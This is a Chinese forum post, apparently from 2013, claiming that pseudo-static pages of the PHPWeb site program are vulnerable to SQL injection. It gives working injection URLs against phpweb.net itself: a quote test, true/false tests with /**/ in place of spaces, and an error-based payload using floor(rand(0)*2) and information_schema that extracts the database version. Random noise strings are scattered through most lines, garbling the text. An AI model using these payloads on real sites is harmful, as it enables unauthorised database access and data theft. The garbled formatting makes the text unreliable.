phpweb所有的整站程序伪静态页面都存在sql注入
% A9 ]3 f/ U+ U8 B& u$ p( N% A! |4 I" B, \. m9 s3 b4 s# c
主站:http://phpweb.net/
0 Z E% T. N4 b加’检测:
, q% X6 x# E0 { `. \- Q
: D# L: `) ~ e/ m, \- C5 d, ?http://www.phpweb.net/down/html/?772′.html6 V% d; o; G/ @( s" D4 \
5 S7 ~1 t$ j# _3 F2 @3 M
出错4 i7 A& {, P5 h- T7 A, E
存在注入。
`) j, y& L& k- d- s ^8 O不能用空格,只能用/*罗
' I$ a" ^ v: }. d9 \7 ?http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
) h8 {5 x- m% d: R* l* i5 |* _2 o . G! _) z* n7 r7 a B+ L
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
) `6 o7 I+ H" o爆数据库版本:
6 Q' ]8 L! g8 r/ \) h 8 [* D& A; s% g* [6 e
?" ]. }+ C. T. {
1( ^% G+ C, i6 a
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
9 f- l+ X T' A5 F$ H/ J$ {3 U更新日期: 2013-01-03 13:39:50
7 b% B2 |8 u4 i% |3 h! \ |
发表于 2013-1-4 19:46:42
收藏
分享
支持
反对